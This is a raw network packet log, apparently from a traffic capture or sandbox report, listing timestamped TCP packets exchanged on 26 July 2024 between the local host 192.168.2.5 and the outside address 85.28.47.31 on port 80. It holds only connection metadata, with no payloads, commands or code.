Jul 26, 2024 20:09:10.545068979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545068979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545080900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545097113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545097113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545097113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545116901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545140028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545140028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545939922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545955896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545972109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545984030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545988083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546003103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546004057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546019077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546035051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546041012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546051025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546061993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546066999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546082973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546083927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546099901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546103001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546114922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546123028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546129942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546152115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546165943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546184063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546936989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546961069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546977043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.546986103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.546992064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547003984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547008038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547023058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547029972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547030926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547036886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547050953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547054052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547071934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547075987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547092915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547096968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547096968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547107935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547120094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547123909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547137976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547146082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547147036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547152996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547167063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547185898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547210932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547837973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547853947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547868967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547874928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547884941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547898054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547902107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547919035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547919035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547933102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547934055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547950983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547960043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547960043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.547966957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547982931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.547983885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548003912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548003912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548026085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548597097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548613071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548628092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548644066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548640966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548660040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548670053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548670053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548675060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548696995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548696995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548705101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548717022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548721075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548737049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548742056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548754930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548763037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548770905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548778057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548787117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548794985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548803091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.548814058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548832893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.548849106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549599886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549616098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549632072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549637079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549647093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549659014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549662113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549678087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549679995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549691916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549695015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549710035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549721956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549721956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549725056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549741030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549747944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549747944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549757004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549767017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549772978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549787998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549796104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.549808979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549838066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.549838066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550497055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550513029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550528049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550543070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550544024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550559044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550559044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550575018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550585032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550590992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550606012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550606012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550606966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550622940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550632000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550632000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550637960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550653934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550657034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550668955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550677061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550677061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550684929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550702095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.550702095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550715923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550745964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.550745964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551330090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551346064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551362038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551372051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551377058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551392078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551393032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551409006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551419973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551419973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551439047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551443100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551460028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551475048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551486015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551486015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551491976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551513910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551513910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551532030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551929951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551948071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551966906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551971912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551981926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.551992893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.551996946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.552011967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.552027941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.552042961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.604073048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.830293894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027595997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027641058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027659893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027673006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027700901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027717113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027734041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027750015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027848005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027848005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027848959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027848959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027848959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027848959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.027920008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.027965069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028130054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028150082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028166056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028177977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028181076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028197050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028206110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028206110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028213024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028227091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028228998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028244019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028254032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028259993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.028269053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028292894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028292894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.028311968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029187918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029251099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029345989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029361010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029376030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029391050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029398918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029398918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029407024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029423952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029426098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029438972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029447079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029447079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029455900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029469967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029470921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029486895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029491901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029503107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029510975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029519081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029526949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029546022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029581070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029716969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029733896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029747963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029762983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029763937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029779911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029779911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029795885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029807091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029807091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029810905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029827118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029833078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029841900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029848099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029858112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029871941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029872894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029872894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029887915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029898882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029903889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.029915094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029934883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.029958010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030579090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030599117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030613899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030622005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030628920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030642986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030644894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030657053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030662060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030677080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030678034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030697107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030699015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030714989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030725956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030725956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030731916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030745029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030745029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.030766010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030788898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.030788898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031620979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031636953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031651020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031657934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031672955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031673908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031691074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031698942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031707048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031722069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031727076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031737089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031747103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031752110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031769037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.031775951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031790972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.031816959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032041073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032056093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032071114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032080889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032085896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032099962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032102108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032114029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032118082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032123089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032133102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032145977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032147884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032160044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032162905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032175064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032179117 CEST	80	49704	85.28.47.31	192.168.2.5
